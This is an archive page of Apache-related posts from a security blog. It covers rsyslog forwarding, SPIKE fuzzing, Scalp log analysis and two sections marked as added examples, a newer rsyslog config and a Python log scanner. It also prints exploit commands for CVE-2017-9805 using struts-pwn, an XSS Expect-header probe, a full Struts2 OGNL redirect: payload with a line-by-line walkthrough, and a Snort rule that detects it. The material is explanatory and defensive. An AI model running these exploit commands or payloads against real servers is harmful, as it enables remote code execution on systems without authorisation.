Showing posts with label Apache. Show all posts

Sunday, December 23, 2018

CVE-2017-9805 - Apache Struts2 REST Plugin XStream RCE

I found this GitHub page extremely useful when practicing pen testing on CVE-2017-9805 - Apache Struts2 REST Plugin XStream RCE


https://github.com/mazen160/struts-pwn_CVE-2017-9805

Check if the vulnerability exists against a single URL.

python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'

Exploit a single URL.

python struts-pwn.py --exploit --url 'http://example.com/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn'

Tuesday, August 9, 2016

Expect: alert(document.domain)

GET / HTTP/1.1
Expect: <script>alert(document.domain)</script>


I saw this request in some web logs; what is it? It appears to be a very old XSS (cross-site scripting) vulnerability in Apache-based web servers from around 2006, so the attacker is looking for old servers that were never patched. The JavaScript alert method creates a popup box in the browser, and the document.domain property evaluates to the domain of the current page (the host part of the URL), so if the server reflects the header unescaped the popup displays that domain.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, June 7, 2016

Forward Apache Logs to rsyslog

If you have a central logging system and you already forward syslogs from your linux server to it, the commands are pretty easy to also auto-forward your Apache access logs (your web traffic).

First, open the configuration file with your favorite text editor (my choice was nano)

nano /etc/rsyslog.conf

In the file, at the top add the import module command to allow file monitoring

$ModLoad imfile

Then near the bottom of the file, but before your remote syslog @ command, add the following lines that will allow you to monitor the file

$InputFilePollInterval 10
$InputFileName /var/log/apache2/access.log
$InputFileTag apache-access:
$InputFileStateFile stat-apache-access
$InputFileSeverity info
$InputFilePersistStateInterval 20000
$InputRunFileMonitor


Then restart the syslog service for the changes to take effect

service rsyslog restart

Then validate syslogging is actually sending by running tcpdump and capturing traffic going outbound to that ip

tcpdump -i eth0 host XX.XX.XX.XX
listening on eth0
13:41:57.322554 IP YY.YY.YY.YY.57529 > XX.XX.XX.XX.514: SYSLOG authpriv.notice, length: 101
13:41:57.322909 IP YY.YY.YY.YY.57529 > XX.XX.XX.XX.514: SYSLOG authpriv.info, length: 104
13:41:57.323224 IP YY.YY.YY.YY.57529 > XX.XX.XX.XX.514: SYSLOG authpriv.info, length: 89


You can also verify apache access logs are enabled and working by viewing the log file that should have your logs at the bottom of them

nano /var/log/apache2/access.log
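The same file-monitoring setup in rsyslog's current RainerScript syntax, as an added example that is not from the original post: the legacy $InputFile* directives above are still accepted by rsyslog, but this is the form its documentation now recommends. CENTRAL_SYSLOG_HOST is a placeholder for the remote address used in your @ line.

```conf
# Added example, not the original post's configuration.
# Load imfile; state files are managed automatically in this syntax, so
# no $InputFileStateFile equivalent is needed.
module(load="imfile")

input(type="imfile"
      File="/var/log/apache2/access.log"
      Tag="apache-access:"
      Severity="info"
      Facility="local7"
      PersistStateInterval="20000")

# Forward only the Apache lines, over TCP (the @@ form) rather than UDP (@),
# so delivery to the central collector is connection-based instead of
# fire-and-forget. The tag "apache-access:" becomes the syslog program name.
# CENTRAL_SYSLOG_HOST is a placeholder.
if $programname == "apache-access" then {
    action(type="omfwd" target="CENTRAL_SYSLOG_HOST" port="514" protocol="tcp")
    stop
}
```

With TCP forwarding the tcpdump check above will show a single established connection to port 514 instead of individual datagrams.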

Hope that helps make your apache logging needs simpler.



Tuesday, September 1, 2015

Website Fuzzing 101

You have a web application. You want to see if there are any buffer overflows, DoS conditions, or other oddities, or you're just interested in determining how well your developers validate input. One possible way is SPIKE, run from a Linux environment.

A SPIKE script tells SPIKE what requests to send. In the example below I'm crafting an HTTP request to send to a test web server, except that the query value will be fuzzed with a bunch of random data.
Example:
s_string("GET /?q=");
s_string_variable("QUERYVALUE");
s_string(" HTTP/1.1\r\n");


Kick off SPIKE...
./generic_send_tcp TESTSERVER 80 ~/scriptfile.spk 0 0

And watch the requests fly out! Then take a look at your application logs, and anywhere the website crashed or generated scary buffer overflow, null reference, database, or other errors, make sure to review that part of the code and patch it so that it handles the fuzz data properly. Your website should be able to gracefully handle any data thrown at it.
Might be good to tail the apache access logs...
tail -f /var/log/apache2/access.log


Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Friday, June 5, 2015

Analyze Apache Access Logs for Malicious Activity

Let's say I have an Apache Web Server access log. I think something fishy was going on yesterday, but I don't want to manually parse through all the disgusting text based logs to find the craziness. I could write a custom python script, splash in some amazing regular expressions, and try to find the bad stuff on my own. Or I could just use somebody else's :-)

This is where a tool like Apache Scalp comes in. It's a free Python script you can download and execute. The only prerequisites are that you have Python installed and that you download the default filter XML file.

Then run the script
  python.exe scalp-0.4.py -l www.mysite_log -o myoutputfolder --html -f default_filter.xml
  Loading XML file 'default_filter.xml'...
  Processing the file 'www.mysite_log'...
  Scalp results:
         Processed 873 lines over 873
         Found 6 attack patterns in 0.581000 s
  Generating output in myoutputfolder\www.mysite_log_scalp_*


It generates a pretty HTML file that you can open in your browser from the myoutputfolder location. Hopefully it saves you a bunch of time.


Thursday, March 26, 2015

Apache Struts2 Remote Code Execution Walkthrough

I recently posted notes on an Apache Struts2 Remote Code Execution attempt

Here's the guts of the attack.

GET /How.do?redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.setCharacterEncoding("UTF-8"),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res.getWriter().print("dir:"),#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),#res.getWriter().flush(),#res.getWriter().close()}

But what is it doing? Let's walk through it in a bit more detail.

Apache Struts is a free, open-source, MVC framework for creating elegant, modern Java web applications.

Back in 2013 it was disclosed that Apache Struts 2.0.0 through 2.3.15 allowed remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.

In this example we see the vulnerable 'redirect:' prefix being used.

GET /How.do?redirect:

Request to a Java servlet on an Apache Tomcat server; the attacker is hoping it runs an old Struts version that is vulnerable to the redirect: prefix code execution issue

${
#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),


Get this web request's HttpServletResponse object so the attacker can tweak its settings

#res.setCharacterEncoding("UTF-8"),

Set the response character encoding to a readable character set, UTF-8

#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),

Get this web request's HttpServletRequest object so the attacker can change what it does

#res.getWriter().print("dir:"),
#res.getWriter().println(
#req.getSession().getServletContext().getRealPath("/")
),
#res.getWriter().flush(),
#res.getWriter().close()}


Change this request so that, instead of redirecting, it writes "dir:" followed by the absolute path on disk where the Apache Tomcat server is hosting the web files into the response, then flushes and closes the writer

Summary: This attack is not actually doing anything except validating that they've found a vulnerable victim server. Odds are that this is an automated bot scanning the internet for victims, and if the bot gets a response back (like an absolute path on disk where Tomcat is running) then it will immediately send another, more malicious request that drops a persistent payload to compromise the server.

Keep your software versions up-to-date.

FYI - This is the Snort rule that captures this attempt
SERVER-APACHE Apache Struts2 blacklisted method redirect (1:29748)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-APACHE Apache Struts2 blacklisted method redirect"; flow:to_server,established; content:".do?redirect|3A|"; fast_pattern:only; http_uri; metadata:policy balanced-ips drop, policy connectivity-ips drop, policy security-ips drop, service http; reference:cve,2013-2248; reference:cve,2013-2251; reference:url,struts.apache.org/release/2.3.x/docs/s2-016.html; reference:url,struts.apache.org/release/2.3.x/docs/s2-017.html; classtype:web-application-attack; sid:29748; rev:1; )
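As an added example (not code from the original posts or from the Scalp project), this Python script applies the log-scanning idea from the "Analyze Apache Access Logs for Malicious Activity" post to the Struts probe walked through here: it parses constructed Apache combined-log lines, applies exactly the ".do?redirect:" URI content match from Snort sid 29748, and generalises it to the three S2-016 prefixes (action:, redirect:, redirectAction:) quoted above. The sample lines, IP addresses and function names are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format (not real traffic).
# The first mirrors the redirect: probe walked through above; the third uses
# the action: prefix that the same S2-016 advisory covers.
SAMPLE_LOG = r'''
203.0.113.5 - - [26/Mar/2015:10:02:11 +0000] "GET /How.do?redirect:${%23res=%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().print(%22dir:%22)} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [26/Mar/2015:10:02:12 +0000] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Mar/2015:10:02:13 +0000] "GET /How.do?action:${1+1} HTTP/1.1" 500 0 "-" "curl/7.0"
'''

# Fields of the combined log format that the checks below need.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# The three parameter prefixes named in the S2-016 description quoted above.
STRUTS_PREFIXES = ("action:", "redirect:", "redirectAction:")

def classify_uri(uri):
    """Return the names of the checks a request URI trips (empty if none)."""
    decoded = unquote(uri)          # probes percent-encode '#' as %23
    hits = []
    # Exactly the content match from Snort sid 29748: ".do?redirect:" in the URI.
    if ".do?redirect:" in decoded:
        hits.append("snort-29748")
    # Generalisation: any of the three prefixes carrying an OGNL expression.
    query = decoded.partition("?")[2]
    for param in query.split("&"):
        for prefix in STRUTS_PREFIXES:
            if param.startswith(prefix) and ("${" in param or "%{" in param):
                hits.append("s2-016:" + prefix)
    return hits

def scan_log(text):
    """Parse each log line and return the suspicious ones with their hits."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                # blank or non-matching line
        hits = classify_uri(m.group("uri"))
        if hits:
            findings.append({"ip": m.group("ip"), "uri": m.group("uri"),
                             "status": int(m.group("status")), "hits": hits})
    return findings
```

Feed it a real access.log via `scan_log(open(path).read())`; a 200 response to a flagged request is the case the walkthrough warns about, since it means the probe got its answer.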
